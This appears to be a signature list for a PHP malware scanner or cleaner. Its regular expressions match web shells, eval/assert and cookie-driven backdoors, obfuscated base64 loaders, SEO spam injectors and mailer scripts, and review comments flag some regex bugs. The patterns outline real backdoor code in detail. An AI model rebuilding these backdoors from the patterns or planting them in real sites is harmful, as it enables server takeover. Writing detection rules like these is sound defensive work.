qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?define\(\'AKISMET\_VERSION\'\,\s+\'2\.2\.6\'\)\;.+?\$dflt\_actn\s+\=\s+\'FilesMan\'\;.+?<input\s+type\=hidden\s+name\=charset>\s+<\/form>/is,
qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\s+\"\"\,\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\s+array\(\$([A-z0-9]{1,20})\{([0-9]{1,10})\}\,\s+\"Wn\"\)\,\s+\"\"\,.+?\)\s+\)\s+\)\;\s+\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+define\(\'\_JEXEC\'\,\s+1\)\;\s+try\{.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?\$db\->query\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+define\(\'\_JEXEC\'\,\s+1\)\;\s+try\{.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?eval\(\$data\_row\->htmlcode\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"ass\".\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+?\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"preg\_\"\.\"repla\"\.\"ce\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/\s+\$([A-z0-9]{1,20})\s+\=\s+\'([A-z0-9]{10,})\+([A-z0-9]{20,})\'\..+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(\".+?\)\)\)\;\s+eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\)\)\)\;\Z/is,
qr/<\?php\s+if\s+\(\!isset\(\$\_SERVER\[\'REQUEST\_URI\'\]\)\s+\|\|\s+ltrim\(\$\_SERVER\[\'REQUEST\_URI\'\]\,\'\/\'\)\s+\=\=\=\s+\'\'\)\s+\{\s+print\s+\'<div\s+class\=\"([A-z0-9]{1,20})\"\s+style\=\"position\:\s+absolute\;\s+left\:\s+\-9999px\;\">\s+\<a\s+href=\"http\:\/\/.+?casino.+?<\/a><\/div>\'\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\"\,([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\(\"\"\)\;\s+\$([A-z0-9]{1,20})\=\(([0-9]{1,10})\-([0-9]{1,10})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$str\s+\=\s+\"([A-z0-9]{1,20})\"\;\$Oo0\=\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\;\$([A-z0-9]{1,20})\s+\=\$\_POST\[\"([A-z0-9]{1,20})\"\]\;\$Oo0\(\$([A-z0-9]{1,20})\)\;\?>/is,
qr/<\?php\s+\$OO00O0\=1\;\$O0O0O0\=1\;eval\s+\(gzinflate\s+\(base64\_decode\s+\(str\_rot13\s+\(.+?\)\)\)\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20}).+?\.chr\(([0-9]{1,10})\)\.\$([A-z0-9]{1,20})\[([0-9]{1,10})\]\.chr\(([0-9]{1,10})\)\..+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20}).+?\.chr\(([0-9]{1,10})\).+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\.chr\(([0-9]{1,10})\).+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$domain\s+\=\s+\'gas\.liveupdates\.host\'\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$m\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+header\(\'Content\-Type\:text\/html\;\s+charset\=UTF\-8\'\)\;\s+\@set\_time\_limit\(0\)\;\s+define\(\'PASSWORD\_FILE\'\,\s+\'p\.txt\'\)\;.+?if\(\!file\_exists\(PASSWORD\_FILE\)\)\s+\{.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\@error\_reporting\(0\)\;.+?function\s+Send\(\)\{.+?\$replyto\=check\_gmail\(\$replyto\)\;.+?return\s+\$result\.\'\@gmail\.com\'\;\s+\}\s+\?>/is,
qr/\"\s+\.\s+base64\_decode\(\"\'\.\$wp\_code\.\'\"\)\)\;\s+\?>\'\;\s+\$wp\_dec\_file\s+\=\s+base64\_decode\(\$wp\_code\)\;.+?\/\/print\s+PLATFORM\;\s+\/\/print\_r\(\$all\_dirs\)\;\s+\?>/is,
qr/<\?php\s+class\s+ControllerProductDesign\s+\{.+?\$this\->muf\=\$this\->dispatch\(\'GIF89alxWam9FZlRWYvxGc19VZ29Wb\'\)\;.+?\$model\->\_continue\(\'done\'\)\;\s+\}/is,
qr/<\?php\s+eval\(\"\?>\"\s+\.\s+base64\_decode\(\".+?\"\)\)\;\s+\?>\s+<\?php\s+\/\*a\,b\,c.+?\*\/\s+\?>/is,
qr/<\?php\s+\$o\=\"([A-z0-9]{1,20}).+?\"\;eval\(base64\_decode\(\".+?\)\)\;return\;\?>/is,
qr/<\?php\s+error\_reporting\s+\(0\)\;.+?if\s+\(array\_key\_exists\s+\(\'delete\'\,\s+\$\_REQUEST\)\).+?\$domains\s+\=\s+get\_user\_domains\s+\(\)\;.+?return\s+join\(\'\.\'\,\s+\$arr\)\;\s+\}\s+\?>/is,
qr/<\?php.+?\$me\s+\=\s+basename\(\_\_FILE\_\_\)\;.+?\}\s+function\s+reload\(\)\{header\(\"Location\:\s+\"\.basename\(\_\_FILE\_\_\)\)\;\}.+?\'\.\'\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?if\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\/\*([A-z0-9]{1,20})\'\..+?exit\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\(\/\*([A-z0-9]{1,20})\'\..+?false\,\$([A-z0-9]{1,20}).+?([A-z0-9]{1,20})\'\;/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+if\(isset\(\$\_REQUEST\[\"start\"\]\)\s+\&\&\s+md5\(\$\_REQUEST\[\"start\"\]\)\s+\=\=\s+\'([A-z0-9]{32})\'\s+\&\&\s+isset\(\$\_REQUEST\[\"stort\"\]\)\)\s+eval\(base64\_decode\(\$\_REQUEST\[\"stort\"\]\)\)\;\?>/is,
qr/<\?php\s+\/\*\s+VTY\s+\-\s+Database\s+Manager\s+For\s+Mysql.+?\$vty\->BitimIslemleri\(\)\;\s+exit\;\s+\}\s+\?>\s+<\?php.+?class\s+dug\s+\{.+?function\s+menu\(\)\{\s+\?>\s+<table.+?\}\/\/class\:db\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=\"\-1\(.+?\$([A-z0-9]{1,20})\=array\(\"([A-z0-9]{1,20})\"\=>\".+?\"\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\"\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;if\(\$([A-z0-9]{1,20})\(\@\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\]\)\=\=\$([A-z0-9]{1,20})\)\$([A-z0-9]{1,20})\(\)\;/is,
qr/\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\"\Wx.+?\"\;\s+\/\*([A-z0-9]{1,10})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,10})\s+\=.+?\$\_([A-z0-9]{1,10})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,10})\'\,\s+([A-z0-9]{1,10})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\s+function\s+([A-z0-9]{1,10})\s+\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\s+\{\s+return\s+\$([A-z0-9]{1,10})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,10})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,10})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,10})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$k\=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'admins\'\]\)\;\?>No\.1\s+<\?php\s+\@preg\_replace\(\"\/\/e\"\,\$\_POST\[\'sss\'\]\,\"Access\s+Denied\"\)\;\?>/is,
qr/<\?php\s+\/\*\s+WSO\s+\[2\.6\]\s+\*\/\$OOO000000\=urldecode\(.+?\=\_\_FILE\_\_\;\$.+?([A-z0-9]{1,20})\Z/is,
# Signature: one-line PHP stub of the form
#   $c=base64_decode('...=').$_GET['n'].'t';@$c($_POST['x']);
# followed by the literal marker "abcabcabc".
# NOTE(review): "\+" right after "<\?php" is a literal plus sign; the other
# "abcabcabc" entries in this list use "\s+" at that position. As written this
# entry only matches "<?php+$c=..." with no whitespace - probably a typo for
# "\s+"; confirm against the sample.
qr/<\?php\+\$c\=base64\_decode\(\'([A-z0-9]{1,20})\=\'\)\.\$\_GET\[\'n\'\]\.\'t\'\;\@\$c\(\$\_POST\[\'x\'\]\)\;\?>abcabcabc/is,
qr/<\?php\s+if\s+\(\$\_REQUEST\[\'action\'\]\s+\=\=\s+\'([A-z0-9]{1,10})\'\)\s+\{\s+\$in\_data\s+\=\s+base64\_decode\(\$\_REQUEST\[\'query\'\]\)\;\s+\$fr\s+\=\s+explode\(\'\|\'\,\s+\$in\_data\)\;\s+if\s+\(mail\(stripslashes\(base64\_decode\(\$fr\[0\]\)\)\,\s+stripslashes\(base64\_decode\(\$fr\[1\]\)\)\,\s+base64\_decode\(\$fr\[2\]\)\,\s+stripslashes\(base64\_decode\(\$fr\[3\]\)\)\)\)\s+\{echo\s+\'query\'\;\}\s+else\s+\{echo\s+\'bad\s+request\'\;\}\s+\}\s+else\s+\{echo\s+\'not\s+found\'\;\}/is,
qr/<head>\s+<meta\s+name\=\"description\"\s+content\=\"ok\s+file\s+uploaded\">\s+<meta\s+http\-equiv\=\"refresh\"\s+content\=\"0\;URL\=http.+?\"\/>\s+<\/head>/is,
# Signature: PHP that defines pre_term_name($wp_kses_data, $wp_nonce),
# references $_COOKIE['f_wp'], assigns a POST <form> to $wp_auth_check, runs
# preg_match for a base64 PNG <img> data URI against $wp_default_logo and ends
# with "echo $wp_auth_check; ?>".
# NOTE(review): the leading "<?" is unescaped, so it means "optional '<'"
# followed by "php". On a file that opens with "<?php" the match therefore
# starts at the letters "php", not at the tag; sibling entries write "<\?php".
# If the matched span is what the cleaner strips, a stray "<?" would be left
# behind - TODO confirm and escape the "?".
qr/<?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$\_COOKIE\[\'f\_wp\'\]\s+\:\s+NULL\)\;\s+\$wp\_auth\_check\s+\=\s+\'<form\s+method\=\s+\"post\"\s+action\=\s+\"\">.+?preg\_match\(\'\#<img\s+src\=\"data\:image\/png\;base64\,\(\.\*\)\">\#\'\,\s+\$wp\_default\_logo\,\s+\$logo\_data\)\;.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+header\(\"HTTP\/1\.1\s+404\s+Not\s+Found\"\)\;.+?if\(file\_exists\(\'\.\/\.\.\/\.\.\/wp\-load\.php\'\)\)\s+require\(\'\.\/\.\.\/\.\.\/wp\-load\.php\'\)\;.+?else\s+\@unlink\(\_\_FILE\_\_\)\;.+?\?>/is,
# Signature: PHP that defines pre_term_name($wp_kses_data, $wp_nonce), assigns
# a POST <form> to $wp_auth_check and ends with "echo $wp_auth_check; ?>".
# NOTE(review): the leading "<?" is unescaped, so it means "optional '<'"
# followed by "php". On a file that opens with "<?php" the match therefore
# starts at the letters "php", not at the tag; sibling entries write "<\?php".
# If the matched span is what the cleaner strips, a stray "<?" would be left
# behind - TODO confirm and escape the "?".
qr/<?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$wp\_auth\_check\s+\=\s+\'<form\s+method\=\s+\"post\"\s+action\=\s+\"\">.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+echo\s+\"javaversion1\"\;\s+passthru\(\$\_POST\[libso\]\)\;\s+\?>/is,
# Signature: the literal text "*/@eval/**", i.e. an @eval token sitting between
# the end of one PHP block comment and the start of the next. Looks like one
# fragment of a call that is split up by comments - confirm against the sample.
qr/\*\/\@eval\/\*\*/is,
# Signature: the literal text "*/(/**config*/$_POST['<name>']);/**", where
# <name> is 1-20 characters from the class [A-z0-9].
# NOTE(review): in ASCII the range "A-z" also covers "[", "\", "]", "^", "_"
# and "`", not only letters, so the class is wider than "A-Za-z0-9".
qr/\*\/\(\/\*\*config\*\/\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*\*/is,
qr/<\?php\s+if\(\!\@\$([A-z0-9]{1,20})\)\{if\(preg\_match\(\'\/alltheweb\|aol\|baidu\|.+?\;endif\;endif\;return\$\_([A-z0-9]{1,50})\;\}\;/is,
qr/<\?php\s+if\(\!\@\$codevyp\)\{if\(preg\_match\(\'\/alltheweb\|aol\|baidu\|.+?\;\}\@\$codevyp\=true\;\}\?>/is,
qr/<\?php\s+if\(\!\@\$incode\!\=false\|\|\!\@\$incode\!\=null\).+?foreach\(scandir\(.+?\=true\;\$incode\=true\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,30})\=\".+?\"\;\s+eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{1,30})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$auth\_pass.+?\$default\_action.+?\$userAgents\).+?\s+exit\;/is,
qr/<\?php\s+define\(\'vpsp\_version\'\,\s+\'2\.5\.0\'\)\;\s+define\(\'vpsp\_pwd\'.+?\}\s+else\s+\{\s+\$ok\s+\=\s+fread\(\$input\,\s+2\)\;\s+if\s+\(\$ok\s+\!\=\s+\'OK\'\)\s+\{\s+header\(\'X\-VPSP\-ERROR\:\s+bad\_request\'\)\;\s+header\(\'X\-VPSP\-HOST\:\s+\'\s+\.\s+\(isset\(\$\_SERVER\[\'HTTPS\'\]\).+?function\s+VC\_Decrypt\(\$str\).+?\}\s+return\s+\$out\;\s+\}/is,
qr/<\?php\s+preg\_replace\(\"\/\.\*\/e\"\,\"\Wx65.+?\Wx3B\"\,\"\.\"\)\;\s+\?>/is,
qr/<\?php\s+\$D\=strrev\(\'edoced\_46esab\'\)\;\$s\=gzinflate\(\$D\(.+?\)\)\;create\_function\(\'\'\,\"\}\$s\/\/\"\)\;\s+\?>/is,
qr/<\?php\s+\@set\_time\_limit\(0\)\;\s+if\(isset\(\$\_POST\[\'Enoc\'\]\)\).+?<script>\s+alert\(\'\-\-\-Todos\s+Spammed\-\-\-\'\)\;\s+<\/script>.+?<\/html>/is,
qr/<\?php\s+\@date\_default\_timezone\_set\(\'UTC\'\)\;\$\_\_\_\_\=base64\_decode\(.+?\=create\_function\(\'\'\,\'\?>.+?\'\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\$host\=base64\_decode.+?\$bot\=urlencode.+?\$ident\)eval\(stripslashes\(\$\_REQUEST\[base64\_decode\(.+?\)\]\)\)\;\?>/is,
qr/<\?php\s+\$payload\=.+?\;preg\_replace\(\'\/\.\*\/e\'\,\".+?\"\,\'\.\'\)\;\s+\?>/is,
qr/<\?php\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+base64\_decode\(\$\_([A-z0-9]{1,20})\)\;\}\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+gzinflate\(\$\_([A-z0-9]{1,20})\,0\)\;\}\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+eval\(\$\_([A-z0-9]{1,20})\)\;\}.+?\"\;preg\_replace\(\'\/\.\*\/e\'\,\".+?\"\,\'\.\'\)\;\s+\?>/is,
qr/<\?php\s+\$\_([A-z0-9]{1,20})\=.+?\"\;\$\_([A-z0-9]{1,20})\=array\(.+?\)\;\$payload\=\".+?\"\"\;for\s+\(\$i\=.+?\Wx\d\d\"\)\;/is,
qr/<\?php\s+\$\{.+?set\_magic\_quotes\_runtime\(0\)\;if\(strtolower\(substr\(PHP\_OS\,0\,3\)\)\=\=.+?\{function\s+scandir\(\$dir\)\{\$\{.+?\"\;\}exit\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;.+?str\_replace\(\"\w\"\,\"\"\,\"s\wtr\w+r\we\wpl\wa\wc\we\"\)\;.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\"\wb\wa\ws\we6\w4\w+d\we\wco\wde\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\"\"\,\"cr\we\wat\we\w+f\wu\wnc\wt\wi\won\"\)\;.+?\?>/is,
qr/<\?php\s+\/\*\s+WSO.+?\=urldecode\(.+?eval\(\$GLOBALS\[.+?\=\=([A-z0-9]{1,20})/is,
qr/<\?php\s+set\_time\_limit\(0\)\;\s+header\(\"Content\-Type.+?function\s+listDir\(\$dir\)echo\s+\"ok\"\;\s+\?>/is,
qr/<\?php\s+\$\w\=base64\_decode\(\'.+?\'\)\.\$\_GET\[\'\w\'\]\.\'\w\'\;\@\$\w\(\$\_POST\[\'\w\'\]\)\;\?>abcabcabc/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'.+?\'\]\)\)\{\$\w\=\"ass\"\.\"ert\"\;\$\w\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}\/\*.+?\*\//is,
qr/<script>\$\=\~\[\]\;\$\=\{\_\_\_\:\+\+\$\,\$\$\$\$\:\(\!\[\].+?\+\$\.\$\$\$\_\+\(\!\[\]\+\"\"\)\[\$\.\_\$\_\]\+\"\)\;\"\+\"\W\"\"\)\(\)\)\(\)\;<\/script>/is,
qr/<script\s+type\=\'text\/javascript\'>\s+var\s+\_([A-z0-9]{1,20})\=.+?\]\]\(\/\^\/\,String\)\)\{while\(.+?\]\]\(\s+new\s+RegExp\(.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\/\*.+?\*\/\=\"preg\"\.\"\_rep\"\.\"lace\"\;\/\*.+?\*\/\$\w\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'.+?\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\{\/\*.+?\*\/\$\w\/\*.+?\*\/\=\/\*.+?\*\/\"asse\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\/\*.+?\*\/\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\/\*.+?\*\/\;exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;\/\*.+?\*\/exit\;\}/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\/\*.+?\*\/\=\"as\"\.\"se\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\/\*.+?\*\/\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\/\*.+?\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\/000\w+\s+if\s+\(\!extension\_loaded\(\'IonCube\_loader\'\)\).+?return\s+0\;\s+\?>.+?\Z/is,
qr/<html><body>.+?<\?php\s+error\_reporting\s+\(0\)\;.+?\&mode\=upload\'\s+method\s+\=\s+\'POST\'.+?clearstatcache\s+\(\)\;.+?echo\s+\"<\/table><br>\"\;/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\)\;\$\{.+?\=\@unserialize\(decode\(get\_params\(\$\{\$\{\"GLO.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\s+\}/is,
qr/<\?php\s+\/\*.+?\*\/if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\)\{\$\w\=\"assert\"\;\$\w\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;.+?\$([A-z0-9]{1,20})\_\_\_\=urldecode\(.+?\)\;if\(\!function\_exists\(\'str\_ireplace\'\)\)\{function\s+str\_ireplace\(\$from\,\$to\,\$string\)\{return\s+trim\(preg\_replace\(\"\/\"\.addcslashes\(\$from.+?exit\(\)\;\}\}.+?\?>/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\=\"as\"\.\"se\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\=\/\*.+?\*\/\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\/\*.+?\*\/\$\w\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'.+?\'\]\,\'\'\)\;\/\*.+?\*\/exit\;\}/is,
